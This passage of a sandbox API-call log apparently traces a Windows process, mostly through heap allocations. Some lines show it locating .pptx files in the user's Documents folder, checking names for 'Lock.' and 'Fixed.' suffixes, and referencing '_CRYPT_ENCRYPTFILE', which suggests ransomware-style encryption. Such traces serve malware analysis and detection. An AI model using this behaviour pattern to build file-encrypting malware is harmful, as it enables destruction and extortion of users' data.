[0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.195] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e558d8 [0266.196] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/MvKsZ2f3N9SAK.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx", lpFilePart=0x8cf650*="MvKsZ2f3N9SAK.pptx") returned 0x2c [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.196] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mvksz2f3n9sak.pptx")) returned 0xffffffff [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBWvBa.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BWvBa.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WvBa.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vBa.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ba.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0266.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBWvBa.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BWvBa.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WvBa.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vBa.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ba.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.199] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0266.199] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.199] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.200] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0266.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0266.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0266.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0266.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0266.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.204] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.204] RtlAllocateHeap 